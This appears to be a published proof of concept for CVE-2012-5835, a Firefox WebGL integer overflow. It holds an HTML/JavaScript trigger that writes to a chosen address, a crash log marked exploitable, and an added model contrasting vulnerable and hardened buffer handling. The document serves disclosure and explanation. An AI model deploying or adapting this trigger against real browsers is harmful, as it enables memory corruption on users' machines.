Mozilla Firefox WebGL Proof Of Concept

Related Vulnerabilities: CVE-2012-5835  
Publish Date: 15 Feb 2017
Author: Bikash Dash

# Exploit Title: Integer overflow in WebGL buffer handling (bufferSubData) in Mozilla Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: Bikash Dash (PoC; originally found by Google Project 0 team)
# Tested On: Mac OS X 10.8.1 (x86-64)
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: dos (Mozilla Firefox, client-side crash)
<html>
  <head>
    <script>
      // WebGL 1 context under the legacy 'experimental-webgl' name used when this PoC was written.
      var gl = document.createElement('canvas').getContext('experimental-webgl')
      var buf = gl.createBuffer()
      gl.bindBuffer(gl.ARRAY_BUFFER, buf)
      var magic = 0x12345678
      // 1. Allocate a real store of magic+1 bytes so an offset of magic is in range.
      gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
      // 2. Re-size with 2^32: the browser records the requested length, while the size
      //    handed to GL wraps in 32 bits, so the GL-side store ends up empty (NULL base).
      gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
      // 3. The bounds check passes against the recorded length; the backend memmove then
      //    writes 1 byte at NULL + magic, i.e. the 0x12345678 write in the crash log below.
      gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
    </script>
  </head>
</html>
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb  %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address.  Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process:         firefox [3732]
Path:            /Applications/Firefox.app/Contents/MacOS/firefox
Identifier:      firefox
Version:         ??? (???)
Code Type:       X86-64 (Native)
Parent Process:  exc_handler [3731]

Date/Time:       2017-02-15 10:44:52.818 +0300
OS Version:      Mac OS X 10.8.1 (12B19)
Report Version:  9

Crashed Thread:  0  Dispatch queue: com.apple.main-thread

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib               0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1   GLEngine                        0x000000010cfa9982 glBufferSubData_Exec + 856
2   XUL                             0x00000001020df955 0x10111a000 + 16537941
3   XUL                             0x000000010257424b 0x10111a000 + 21340747
4   XUL                             0x0000000102564622 0x10111a000 + 21276194
5   XUL                             0x0000000102573ae2 0x10111a000 + 21338850
6   XUL                             0x0000000102573ce9 0x10111a000 + 21339369
7   XUL                             0x0000000102573fe5 0x10111a000 + 21340133
8   XUL                             0x00000001024f2d2d 0x10111a000 + 20811053
9   XUL                             0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10  XUL                             0x000000010182121d 0x10111a000 + 7369245
11  XUL                             0x00000001015ef000 0x10111a000 + 5066752
12  XUL                             0x00000001015f0538 0x10111a000 + 5072184
13  XUL                             0x00000001015f117a 0x10111a000 + 5075322
14  XUL                             0x00000001015ee4bd 0x10111a000 + 5063869
15  XUL                             0x00000001019a41b6 0x10111a000 + 8954294
16  XUL                             0x00000001019a6285 0x10111a000 + 8962693
17  XUL                             0x00000001019aa94d 0x10111a000 + 8980813
18  XUL                             0x00000001021324f3 0x10111a000 + 16876787
19  XUL                             0x00000001020f1c0e 0x10111a000 + 16612366
20  XUL                             0x0000000101f5b009 0x10111a000 + 14946313
21  XUL                             0x0000000101f1f4bf 0x10111a000 + 14701759
22  com.apple.CoreFoundation        0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23  com.apple.CoreFoundation        0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24  com.apple.CoreFoundation        0x00007fff918204e5 __CFRunLoopRun + 789
25  com.apple.CoreFoundation        0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26  com.apple.HIToolbox             0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27  com.apple.HIToolbox             0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28  com.apple.HIToolbox             0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29  com.apple.AppKit                0x00007fff96591fa3 _DPSNextEvent + 685
30  com.apple.AppKit                0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31  XUL                             0x0000000101f1e942 0x10111a000 + 14698818
32  com.apple.AppKit                0x00007fff96588c03 -[NSApplication run] + 517
33  XUL                             0x0000000101f1ed2d 0x10111a000 + 14699821
34  XUL                             0x0000000101d867b4 0x10111a000 + 13027252
35  XUL                             0x0000000101121193 0x10111a000 + 29075
36  XUL                             0x0000000101125fbb 0x10111a000 + 49083
37  XUL                             0x00000001011264c3 XRE_main + 307
38  org.mozilla.firefox             0x0000000100001e15 0x100000000 + 7701
39  org.mozilla.firefox             0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0xffffffff0b4f3400  rbx: 0x000000011506ac00  rcx: 0x0000000000000000  rdx: 0x0000000000000001
  rdi: 0x0000000012345678  rsi: 0x0000000106e521d1  rbp: 0x00007fff5fbfb9d0  rsp: 0x00007fff5fbfb9d0
   r8: 0x0000000000000000   r9: 0x00007fff5fbfb970  r10: 0x000000010a50c5b0  r11: 0x0000000012345678
  r12: 0x0000000012345678  r13: 0x0000000113607b68  r14: 0x0000000113607b40  r15: 0x0000000000000001
  rip: 0x00007fff92c82a41  rfl: 0x0000000000010206  cr2: 0x0000000012345678
Logical CPU: 2
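Why the three calls above end in a write to 0x12345678 is easier to see in a small model of the bookkeeping involved. The block below is an added example, not part of the original PoC and not Mozilla's code: FakeGLBackend, VulnerableBuffer, HardenedBuffer, runPoc and probeContext are invented names, and the 32-bit backend width and the 2^31-1 limit in the hardened version are assumptions about the backend, not facts taken from the Firefox source. It replays the PoC's calls against a front end that trusts the requested size (the check the PoC defeats) and against one that validates the size before changing state and records what the backend actually holds.

```javascript
// Added example (not the original PoC, not Mozilla's code): model of the
// recorded-length vs real-store mismatch behind CVE-2012-5835.
const GL_NO_ERROR = 0;
const GL_INVALID_VALUE = 0x0501;
const MAGIC = 0x12345678;

// Hypothetical backend: sizes are taken mod 2^32, as a 32-bit size parameter
// or a careless cast would do. It keeps only a length, not a real allocation.
class FakeGLBackend {
  constructor() { this.storeLength = 0; }
  bufferData(size) { this.storeLength = size >>> 0; }   // 2^32 -> 0
  // memmove(store + offset, src, n) has no check of its own: report where it lands.
  bufferSubData(offset, src) {
    const end = offset + src.byteLength;
    return { wild: end > this.storeLength, offset, end, error: GL_NO_ERROR };
  }
}

// Vulnerable front end: bounds-checks bufferSubData against the length it was
// ASKED for, which the backend never actually allocated.
class VulnerableBuffer {
  constructor() { this.backend = new FakeGLBackend(); this.byteLength = 0; }
  bufferData(sizeOrView) {
    const size = typeof sizeOrView === 'number' ? sizeOrView : sizeOrView.byteLength;
    this.byteLength = size;            // 64-bit request recorded verbatim
    this.backend.bufferData(size);     // backend sees it mod 2^32
    return GL_NO_ERROR;
  }
  bufferSubData(offset, src) {
    const end = offset + src.byteLength;
    if (offset < 0 || end > this.byteLength) {
      return { wild: false, offset, end, error: GL_INVALID_VALUE };
    }
    return this.backend.bufferSubData(offset, src);
  }
}

// Hardened front end: reject any size the backend cannot represent BEFORE
// touching state, then record the length the backend really holds.
class HardenedBuffer extends VulnerableBuffer {
  bufferData(sizeOrView) {
    const size = typeof sizeOrView === 'number' ? sizeOrView : sizeOrView.byteLength;
    // Assumed backend limit: largest value a signed 32-bit size can carry.
    if (!Number.isInteger(size) || size < 0 || size > 0x7fffffff) return GL_INVALID_VALUE;
    this.backend.bufferData(size);
    this.byteLength = this.backend.storeLength;   // ask, do not assume
    return GL_NO_ERROR;
  }
}

// Replays the PoC's three calls and reports what happened at each step.
function runPoc(buf) {
  // Stand-in for new Uint8Array(magic+1): same byteLength, no 291 MB allocation.
  const first = buf.bufferData({ byteLength: MAGIC + 1 });
  const second = buf.bufferData(Math.pow(2, 32));            // the overflowing size
  const write = buf.bufferSubData(MAGIC, new Uint8Array(1));
  return { first, second, write, recorded: buf.byteLength, real: buf.backend.storeLength };
}

// For a real browser only: hand this a WebGL context to see how it treats the
// overflowing size without issuing the bufferSubData that crashes. BUFFER_SIZE and
// getError() are standard WebGL 1 queries; what a given build reports is not
// assumed here, the pair is just the evidence to look at.
function probeContext(gl) {
  const buf = gl.createBuffer();
  gl.bindBuffer(gl.ARRAY_BUFFER, buf);
  gl.bufferData(gl.ARRAY_BUFFER, 16, gl.STATIC_DRAW);
  gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW);
  return { error: gl.getError(), size: gl.getBufferParameter(gl.ARRAY_BUFFER, gl.BUFFER_SIZE) };
}
```

Against VulnerableBuffer the second bufferData succeeds, the recorded length is 4294967296 while the real store is 0 bytes, and the bufferSubData at MAGIC is accepted and lands outside the store, mirroring the memmove to 0x12345678 in the crash log. Against HardenedBuffer the 2^32 request is refused with INVALID_VALUE and no state changes, so the later 1-byte write at MAGIC stays inside the first, still valid, allocation.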